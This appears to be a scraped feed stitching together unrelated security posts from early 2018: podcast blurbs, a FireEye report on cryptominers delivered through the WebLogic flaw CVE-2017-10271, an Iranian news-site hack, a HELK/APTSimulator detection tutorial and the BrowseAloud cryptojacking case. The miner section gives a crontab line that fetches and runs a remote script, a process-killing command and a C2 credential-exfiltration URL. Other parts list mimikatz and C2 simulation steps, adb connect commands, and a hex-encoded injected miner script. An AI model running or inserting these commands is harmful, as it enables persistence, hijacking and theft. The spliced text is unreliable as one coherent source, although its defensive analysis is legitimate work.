The preview pane is enough to get an overview of the recorded data.

 

Pressing spacebar opens the file in Quick Look, which is useful for data that doesn’t fit neatly into the preview pane.

Importing the user_user_graph.csv file into Gephi provided me with some neat visualizations about the pytorch community.

A full zoom out of the pytorch community

Here we can see who the main influencers are. It seems that Yann LeCun and François Chollet are Tweeting about pytorch, too.

Here’s a zoomed-in view of part of the network.

Zoomed in view of part of the Gephi graph generated.

If you enjoyed this post, check out the previous two articles I published on using the Twitter API here and here. I hope you have fun tailoring this script to your own needs!

They Stole My Shoes – Paul’s Security Weekly #548

This week, Steve Tcherchian, CISO and Director of Product Management of XYPRO Technology joins us for an interview! In our second feature interview, Paul speaks with Michael Bazzell, OSINT & Privacy Consultant! In the news, we have updates from Google, Bitcoin, NSA, Microsoft, and more on this episode of Paul's Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/Episode548

 

Visit https://www.securityweekly.com/psw for all the latest episodes!

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

Introduction

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().


Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).


Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers


Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence


Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers


Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”.  In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.  

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers


Figure 6: Terminating processes directly


Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connecting to mining pools with a wallet key


Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion


Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether it’s running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials, and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, then the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to determine whether that particular host is vulnerable to EternalBlue, and uses that exploit to spread to the host.

After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.


Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers


Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware


Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence


Figure 13: Cron job for persistence

  • Tries to kill other potential miners so it can monopolize the CPU


Figure 14: Terminating other potential miners

The function shown in Figure 14 finds processes with high CPU usage and terminates them, killing other potential miners and maximizing the resources available to the attacker's own miner. A rough sketch of both behaviors follows.
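In shell terms, the cron persistence and the high-CPU process killing look roughly like this; the URL, file name, and CPU threshold are placeholder assumptions, not the actual script contents.

# Persistence: replace the user's crontab with a job that re-fetches and runs the payload every 30 minutes
echo '*/30 * * * * curl -fsSL http://<remote-server>/miner.sh | sh' | crontab -

# Resource hogging: find and kill any process using more than 40% CPU
ps aux --sort=-%cpu | awk 'NR>1 && $3>40 {print $2}' | xargs -r kill -9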

Conclusion

Cryptocurrency mining malware is a popular tool for financially motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, which illustrates the profitability driving the recent rise in such attacks. Additionally, these operations may be perceived as less risky than ransomware operations, since victims may not even know the activity is occurring beyond a slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner, so that cyber criminals can maximize their reach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

  • POWERSHELL DOWNLOADER (METHODOLOGY)
  • MONERO MINER (METHODOLOGY)
  • MIMIKATZ (CREDENTIAL STEALER)

Indicators of Compromise

MD5                                  Name
3421A769308D39D4E9C7E8CAECAF7FC4     cranberry.exe/logic.exe
B3A831BFA590274902C77B6C7D4C31AE     xmrig.exe/yam.exe
26404FEDE71F3F713175A3A3CEBC619B     1.ps1
D3D10FAA69A10AC754E3B7DDE9178C22     2.ps1
9C91B5CF6ECED54ABB82D1050C5893F2     info3.ps1
3AAD3FABF29F9DF65DCBD0F308FF0FA8     info6.ps1
933633F2ACFC5909C83F5C73B6FC97CC     lower.css
B47DAF937897043745DF81F32B9D7565     lib.css
3542AC729035C0F3DB186DDF2178B6A0     bootstrap.css

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Happy Valentine’s Day – Enterprise Security Weekly #80

This week, Paul and John are accompanied by Guy Franco, Security Consultant for Javelin Networks, who will deliver a Technical Segment on Domain Persistence! In the news, we have updates from ServerSide, Palo Alto, NopSec, Microsoft, and more on this episode of Enterprise Security Weekly!  

 

Full Show Notes: https://wiki.securityweekly.com/ES_Episode80

 

Visit https://www.securityweekly.com/esw for all the latest episodes!

SamSam: Converting Opportunity into Profit

Threat actors continue to use opportunistic attacks to compromise networks and deploy SamSam ransomware to collect money from various types of organizations.



What Developers Can Learn at the Upcoming DevSecOps Virtual Summit

The shift to DevOps and DevSecOps has already happened; it's only a question of when we all catch up. Organizations in all industries are creating software not only faster, but also in more precise, collaborative, and incremental ways than ever before. In fact, we’ve seen the shift in our own customer base, where the percentage of applications scanned for security on a weekly basis jumped 50 percent last year. This shift casts a wide net, affecting everything from policies to training and tools.

In turn, DevSecOps has major implications for the development professional’s role in securing the software development process. With security shifting left, and into the hands of the developer, the security team is no longer responsible for conducting security testing, but for enabling developers to do it.

Get a handle on this shift and what it means for you by attending our Virtual Summit, Assembling the Pieces of the DevSecOps Puzzle, on February 28. You’ll get practical tips and advice on a developer’s role in a DevSecOps world, including:

Shifting Left With Integrations 

You may feel like you play a small or even no role in choosing and implementing security testing tools. But as development accelerates, any security tool that does not integrate seamlessly with current developer processes and workflows will be seen as disruptive and slow. Do you know who in your organization is choosing which tools are used? Developers can proactively champion tools that work with the technology they're already using, gain valuable alignment with security teams, and ensure all code is secured as early in the lifecycle as possible. This session will help you understand how, where, and when application security fits into a modern development organization.

Avoid Release Slowdowns With Security Champions 

DevSecOps is about speed and precision, yet security is often seen by development managers as a training burden or blocking issue. There just aren’t enough security experts to go around. But how do you support all of the development teams? What if I told you that through careful selection and good training it is possible to build your own army from the very people who own the development process? Attend this session to learn dos and don'ts from someone who has done it before.

Why Developer Security Training Is Worth Doing and How It Can Be Implemented

Most developers have little to no formal security training; in fact, fewer than one in four were required to take a single college course on security. But CA Veracode scan data shows that developer training can have a significant impact on code quality, with eLearning leading to a 19% improvement in fix rates and Remediation Coaching improving fix rates by 88%. In this session you’ll get actionable advice from our own VP of Engineering on how to boost your own developers’ secure coding skills.

Make Security a Skill in Your Set: Attend our upcoming Virtual Summit to hear practical tips and advice on these topics and more from experts who have been, or are, practitioners – they’ve been there, and have invaluable insights and experience to share.

Sessions cover topics such as:

  • How to tweak application security policies to not slow DevOps.
  • Why security champions are important and how to develop them.
  • The role of developer security training in DevOps and best practices for implementing it.
  • How to shift security left by integrating security tools into existing tools and processes.

Get all the Summit details here. Ready to sign up? Reserve your seat today.

On the Anniversary of the Islamic Revolution, 30 Iranian News sites hacked to show death of Ayatollah Khamenei

February 11th marked the 39th anniversary of the Islamic Revolution in Iran, the day when the Shah was overthrown and the government was replaced by that of Ayatollah Khomeini, called "The Supreme Leader" of Iran.  February 10th marked something quite different -- the day when hackers gained administrative control of more than 30 Iranian news websites, using stolen credentials to log in to their Content Management Systems (CMS) and publish a fake news story: the death of Ayatollah Khamenei.

The Iranian Ministry of Communications and Information Technology shared the results of its investigation via the Iranian CERT (certcc.ir), which announced the details of the hack in this PDF report.  All of the websites in question, which most famously included ArmanDaily.ir, were hosted on the same platform: a Microsoft IIS web server running ASP.NET.

Most of the thirty hacked websites were insignificant as far as global traffic is concerned, but several are quite popular.  We evaluated each site listed by CERTCC.ir by looking up its Alexa ranking (Alexa ranks websites by global popularity).  Three of the sites are among the 100,000 most popular websites on the Internet.


News Site              Alexa Ranking
SharghDaily.ir         33,153
NoavaranOnline.ir      43,737
GhanoonDaily.ir        79,955
Armandaily.ir          104,175
BankVarzesh.com        146,103
EtemadNewspaper.ir     148,450
BaharDaily.ir          410,358
KaroonDaily.ir         691,550
TafahomNews.com        1,380,579
VareshDaily.ir         1,435,862
NimnegahShiraz.ir      2,395,969
TWeekly.ir             2,993,755
NishKhat.ir            3,134,287
neyrizanfars.ir        3,475,281
Asreneyriz.ir          7,820,850
Ecobition.ir           8,819,111
saraFrazanNews.ir      9,489,254
DavatOnline.ir         9,612,775

These rankings put the online readership of the top news sites listed on par with a mid-sized American newspaper.  For example, the Fort Worth Star-Telegram ranks 31,375, while the Springfield, Illinois State Journal-Register is 84,882.  (For more perspective, the Boston Globe is 4,656, while the New York Times is 111.)

Hacked Sites not listed by Alexa among the top ten million sites on the Internet included: Aminehamee.ir, armanmeli.ir, Baharesalamat.ir, bighanooonline.ir, hadafeconomic.ir, kaenta.ir, naghshdaily.ir, niloofareabi.ir, sayehnews.com, setarezobh.ir, shahresabzeneyriz.ir.

CERTCC.ir's report notes that the primary explanation of the attack is that all of the attacked news sites used "the default user name and password of the backup company," and that a "high-level" gmail.com email account with the same username and password had permissions to all of the sites.

Although the official Islamic Republic News Agency says the source of the attack was "the United Kingdom and the United States," that accusation is not entirely supported by the CERT's report.  The IP address 93.155.130.14 is listed by the Iranian CERT as belonging to a UK-based company using AS47453.  Several sources, including the Iranian site fa.alalam.ir, point out that this is actually a Bulgarian IP address: AS47453 belongs to "itservice.gb-net," with support details listed in Pleven, Bulgaria.

93.155.130.14 - mislabeled in the original CERTCC.ir report
This mislabeling appears to have been human error rather than deception, and the CERT has released an updated version of the Iranian news site hacking report, which can be found here, showing the corrected information.

The corrected version of the report ... (created Feb 12, 04:08 AM)

The CERT report is rather uncomplimentary toward the hackers, mentioning several clumsy, failed attempts to dump a list of user IDs and passwords from the Content Management System database via SQL injection, as well as several other automated attacks.  In the end, however, the measure of a hacker is in many ways success, and it does seem that the objective -- shaming the Ayatollah by declaring his death on the eve of the Islamic Revolution holiday -- was achieved.

While a source IP address alone cannot provide attack attribution, Newsweek reports that on the day the attack began (Thursday, February 8, 2018), Ayatollah Ali Khamenei gave a speech to commanders of the Iranian Air Force in which he claimed that the United States had created the Islamic State militant group and is responsible for all the death and destruction ISIS has caused.  That could certainly serve as a motive for certain actors.  The holiday itself, called "Death to America Day" by American politicians, included the usual occasional burning of American, Israeli, and British flags, as well as several Donald Trump effigies, though overall the protests seemed more subdued than in the past.

from: http://www.newsweek.com/iran-says-us-even-worse-isis-bombing-supreme-leader-allies-syria-802257 





IDG Contributor Network: How to ensure that giving notice doesn’t mean losing data

Most IT teams invest resources to ensure data security when onboarding new employees. You probably have a checklist that covers network access and permissions, access to data repositories, security policy acknowledgement, and maybe even security awareness education. But how robust is your offboarding security checklist? If you’re just collecting a badge and disabling network and email access on the employee’s last day, you’re not doing enough to protect your data.

Glassdoor reported recently that 35% of hiring decision makers expect more employees to quit in 2018 compared to last year. Whether through malicious intent or negligence, when insiders leave, there’s a risk of data leaving with them. To ensure data security, you need to develop and implement a robust offboarding process.

To read this article in full, please click here

This Is An Emergency – Business Security Weekly #73

This week, Michael and Paul interview Dawn-Marie Hutchinson, Executive Director of Optiv Offline! In the Article Discussion, security concern pushing IT to channel services, what drives sales growth and repeat business, and in the news, we have updates from Proofpoint, J2 Global, LogMeIn, and more on this episode of Business Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode73

 

Visit https://www.securityweekly.com/ssw for all the latest episodes!

Autosploit: A Marriage Made for DDoS Botnets

On January 30, 2018, a new mass exploitation tool called “Autosploit” was released on GitHub, a Git repository hosting service. Autosploit leverages Python code to automatically search for vulnerable devices connected to the Internet and then uses Metasploit’s collection of exploits to take over computers and IoT devices. It automatically trawls the Internet for vulnerable devices that can be leveraged for DDoS attacks. Autosploit is not new code, per se, because it is a combination of the previously existing Shodan and Metasploit modules, which have long been used for penetration testing. However, this “marriage” of code makes it easier than ever for hackers to recruit new devices into their own botnets, which could be used to mine cryptocurrencies, hack Internet applications, or launch distributed denial of service (DDoS) attacks.

Autosploit enables both skilled cybercriminals and amateurs who lack technical expertise (also known as “script kiddies”) to form massive DDoS botnets, thus expanding the pool of potential hackers. As a result, many security experts predict an increase in the number of DDoS attacks and other cyber incidents.

A significant motivation behind DDoS attacks is financial gain, via extortion and ransom threats. These new, evolving malware-as-a-service tools and techniques signal that the gates are down and companies face being attacked continuously. These forms of malware provide unending opportunities for cybercriminals to hijack vulnerable devices and subsequently launch attacks against online organizations with ease.

It is imperative for organizations to implement a next-generation Internet gateway that includes a best-of-breed DDoS mitigation layer to immediately detect and mitigate DDoS attacks. Without this layer, companies hit with a DDoS attack could face significant loss of revenue and reputation due to outages.

For more information, contact us.

Jim Carrey Hacked My Facebook – Application Security Weekly #05

This week, Keith and Paul continue to discuss OWASP Application Security Verification Standard! In the news, Cisco investigation reveals ASA vulnerability is worse than originally thought, Google Chrome HTTPS certificate apocalypse, Intel made smart glasses that look normal, and more on this episode of Application Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ASW_Episode05

 

Visit https://www.securityweekly.com/ for all the latest episodes!

IDG Contributor Network: 7 ways to stay safe online on Valentine’s Day

Valentine’s Day brings out the softer side in all of us and often plays on our quest for love and appreciation. Online scammers know that consumers are more open to accepting cards, gifts and invitations all in the name of the holiday. While our guards are down, here are a few tips for safeguarding yourself while on your quest to find love on the Internet.

1. Darker side of dating websites

Unfortunately, dating websites — and modern dating apps — are a hunting ground for hackers. Online dating activity peaks between New Year’s and Valentine’s Day, and cybercriminals are ready to take advantage of the increased action on popular dating websites like Tinder, OKCupid, Plenty of Fish, Match.com and many others. Rogue adverts and rogue profiles are two of the biggest offenders. Because many people are now skeptical of unsolicited advertisements via email, spammers have moved to popular websites, including dating and adult sites, to post rogue ads and links. In August 2015, Malwarebytes detected malvertising attacks on PlentyOfFish, which draws more than three million daily users. Just a few months later, the U.K. version of online dating website Match.com was also caught serving up malvertising.

To read this article in full, please click here

Firestarter: Old School and False Analogies


This week we skip our series on cloud fundamentals and go back to Firestarter basics. We start with a discussion of the week’s big acquisition (like, BIG, considering the multiple). Then we talk about the hyperbole around the release of the iBoot code from an old version of iOS. We also discuss Apple, cyberinsurance, and actuarial tables. Then we finish up with Rich blabbing about lessons learned as he works on his paramedic recertification and the parallels it brings to security. For more on that you can read these posts: https://securosis.com/blog/this-security-shits-hard-and-it-aint-gonna-get-any-easier and https://securosis.com/blog/best-practices-unintended-consequences-negative-outcomes

Watch or listen:


- Rich

toolsmith #131 – The HELK vs APTSimulator – Part 1

Ladies and gentlemen, for our main attraction, I give you...The HELK vs APTSimulator, in a Death Battle! The late, great Randy "Macho Man" Savage said many things in his day, in his own special way, but "Expect the unexpected in the kingdom of madness!" could be our toolsmith theme this month and next. Man, am I having a flashback to my college days, many moons ago. :-) The HELK just brought it on. Yes, I know, HELK is the Hunting ELK stack, got it, but it reminded me of the Hulk, and then, I thought of a Hulkamania showdown with APTSimulator, and Randy Savage's classic, raspy voice popped in my head with "Hulkamania is like a single grain of sand in the Sahara desert that is Macho Madness." And that, dear reader, is a glimpse into exactly three seconds or less in the mind of your scribe, a strange place to be certain. But alas, that's how we came up with this fabulous showcase.
In this corner, from Roberto Rodriguez, @Cyb3rWard0g, the specter in SpecterOps, it's...The...HELK! This, my friends, is the s**t, worth every ounce of hype we can muster.
And in the other corner, from Florian Roth, @cyb3rops, the Fracas of Frankfurt, we have APTSimulator. All your worst adversary apparitions in one APT mic drop. This...is...Death Battle!

Now with that out of our system, let's begin. There's a lot of goodness here, so I'm definitely going to do this in two parts so as not to undervalue these two offerings.
HELK is incredibly easy to install. It's also well documented, with lots of related reading material; let me propose that you take the time to review it all. Pay particular attention to the wiki, gain comfort with the architecture, then review the installation steps.
On an Ubuntu 16.04 LTS system I ran:
  • git clone https://github.com/Cyb3rWard0g/HELK.git
  • cd HELK/
  • sudo ./helk_install.sh 
Of the three installation options presented (pulling the latest HELK Docker image from the cyb3rward0g Docker Hub, building the HELK image from a local Dockerfile, or installing HELK from a local bash script), I chose the first and went with the latest Docker image. The installation script does a fantastic job of fulfilling dependencies for you; if you haven't installed Docker, the HELK install script does that for you too. You can observe the entire install process in Figure 1.
Figure 1: HELK Installation
You can immediately confirm a clean installation by navigating to your HELK Kibana URL, in my case http://192.168.248.29.
For my test Windows system I created a Windows 7 x86 virtual machine with VirtualBox. The key to success here is ensuring that you install Winlogbeat on the Windows systems from which you'd like to ship logs to HELK. More important is ensuring that you run Winlogbeat with the right winlogbeat.yml file. You'll want to modify and copy this to your target systems. The critical modification is line 123, under Kafka output, where you need to add the IP address of your HELK server in three spots. My modification appeared as hosts: ["192.168.248.29:9092","192.168.248.29:9093","192.168.248.29:9094"]. As noted in the HELK architecture diagram, HELK consumes Winlogbeat event logs via Kafka.
On your Windows systems, with a properly modified winlogbeat.yml, you'll run:
  • ./winlogbeat -c winlogbeat.yml -e
  • ./winlogbeat setup -e
You'll definitely want to set up Sysmon on your target hosts as well. I prefer to do so with the @SwiftOnSecurity configuration file. For an initial setup, use sysmon.exe -accepteula -i sysmonconfig-export.xml. If you're modifying an existing configuration, use sysmon.exe -c sysmonconfig-export.xml. This ensures rich data returns from Sysmon, whether you're using adversary emulation from APTSimulator, as we will, or experiencing the real deal.
With all set up and working you should see results in your Kibana dashboard as seen in Figure 2.

Figure 2: Initial HELK Kibana Sysmon dashboard.
Now for the showdown. :-) Florian's APTSimulator does some comprehensive emulation to make your systems appear compromised under the following scenarios:
  • POCs: Endpoint detection agents / compromise assessment tools
  • Test your security monitoring's detection capabilities
  • Test your SOCs response on a threat that isn't EICAR or a port scan
  • Prepare an environment for digital forensics classes 
This is a truly admirable effort, one I advocate for most heartily as a blue team leader. With particular attention to testing your security monitoring's detection capabilities: if you don't do so regularly and comprehensively, you are, quite simply, incomplete in your practice. If you haven't tested and validated, don't consider it detection; it's just a rule with a prayer. APTSimulator can be observed conducting the likes of:
  1. Creating typical attacker working directory C:\TMP...
  2. Activating guest user account
    1. Adding the guest user to the local administrators group
  3. Placing a svchost.exe (which is actually srvany.exe) into C:\Users\Public
  4. Modifying the hosts file
    1. Adding update.microsoft.com mapping to private IP address
  5. Using curl to access well-known C2 addresses
    1. C2: msupdater.com
  6. Dropping a Powershell netcat alternative into the APT dir
  7. Executing nbtscan on the local network
  8. Dropping a modified PsExec into the APT dir
  9. Registering mimikatz in At job
  10. Registering a malicious RUN key
  11. Registering mimikatz in scheduled task
  12. Registering cmd.exe as debugger for sethc.exe
  13. Dropping web shell in new WWW directory
A couple of notes here.
Download and install APTSimulator from the Releases section of its GitHub pages.
APTSimulator includes curl.exe, 7z.exe, and 7z.dll in its helpers directory. Be sure that you drop the correct version of 7-Zip for your system architecture; the default binaries appear to be 64-bit, and I was testing on a 32-bit VM.

Let's do a fast run-through with HELK's Kibana Discover option, looking for the above-mentioned APTSimulator activities. Starting with a search for TMP in the sysmon-* index yields immediate results and strikes #1, 6, 7, and 8 from our APTSimulator list above; see for yourself in Figure 3.

Figure 3: TMP, PS nc, nbtscan, and PsExec in one shot
Created TMP, dropped a PowerShell netcat, nbtscanned the local network, and dropped a modified PsExec, check, check, check, and check.
How about enabling the guest user account and adding it to the local administrator's group? Figure 4 confirms.

Figure 4: Guest enabled and escalated
Strike #2 from the list. Something tells me we'll immediately find svchost.exe in C:\Users\Public. Aye, Figure 5 makes it so.

Figure 5: I've got your svchost right here
Knock #3 off the to-do, including the process.commandline, process.name, and file.creationtime references. Up next, the At job and scheduled task creation. Indeed, see Figure 6.

Figure 6. tasks OR schtasks
I think you get the point; there weren't any misses here. There are, of course, visualization options. Don't forget about Kibana's Timelion feature. Forensicators and incident responders live and die by timelines; use it to your advantage (Figure 7).

Figure 7: Timelion
Finally, for this month, under HELK's Kibana Visualize menu, you'll note 34 visualizations. By default these are pretty basic, but you can quickly add value with sub-buckets. As an example, I selected the Sysmon_UserName visualization. Initially it yielded a donut graph inclusive of malman (my pwned user), SYSTEM, and LOCAL SERVICE. That wasn't granular enough to be particularly useful, so I added a sub-bucket to include process names associated with each user. The resulting graph is more detailed and tells us that of the 242 events in the last four hours associated with the malman user, 32 were specific to cmd.exe processes, or 18.6% (Figure 8).

Figure 8: Powerful visualization capabilities
This has been such a pleasure this month; I am thrilled with both HELK and APTSimulator. The true principles of blue teaming and detection quality are innate in these projects. The fact that Roberto considers HELK to still be in an alpha state leads me to believe there is so much more to come. Be sure to dig deeply into APTSimulator's Advanced Solutions as well; there's more than one way to emulate an adversary.
Next month Part 2 will explore the Network side of the equation via the Network Dashboard and related visualizations, as well as HELK integration with Spark, Graphframes & Jupyter notebooks.
Aw snap, more goodness to come, I can't wait.
Cheers...until next time.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

For starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions, and tablets over a several-day period. The researchers said the malware uses the ADB debug interface on port 5555 to spread and that it has Mirai code within its scanning module.
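For defenders, a quick way to find devices on a network that expose the ADB debug interface abused by ADB.Miner is to probe port 5555; the subnet and device address below are placeholders.

# Scan a subnet for ADB-over-TCP listeners
nmap -p 5555 --open <your-subnet>/24

# If ADB over TCP is enabled, adb can attach to the device without credentials
adb connect <device-ip>:5555
adb devices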

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors of the Bee Token ICO were also duped after scammers sent out phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.



Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financial Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their names, addresses, and account numbers.
  • Other notable events:  Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.

[Chart: newly seen targets for the week ending 2018-02-10]

Cyber Risk Trends From the Past Week

A federal indictment charging 36 individuals for their role in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods.  It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.

 

Trust Me, I am a Screen Reader, not a CryptoMiner

Until late Sunday afternoon, a number of public sector websites, including the ICO, the NHS, and local councils (for example, Camden in London), had been serving a cryptominer unbeknownst to visitors, turning them into a free computing cloud at the service of unknown hackers. Although initially only UK sites appeared to be affected, subsequent reports included Irish and US websites as well.


Figure 1: BrowseAloud accessibility tool.

While researchers initially considered the possibility of a new vulnerability being exploited at large, Scott Helme (https://twitter.com/Scott_Helme/status/962691297239846914) quickly identified the culprit: a foreign JavaScript fragment added to the BrowseAloud (see Figure 1) JavaScript file (https://www.browsealoud[.]com/plus/scripts/ba.js), an accessibility tool used by all the affected websites:

\x3c\x73\x63\x72\x69\x70\x74\x3e 
\x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72
\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x7b\x74\x68\x72\x65\x61\x64\x73\x3a 
\x4d\x61\x74\x68\x2e\x72\x6f\x75\x6e\x64\x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x
61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79\x2f\x33\x29\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a
\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
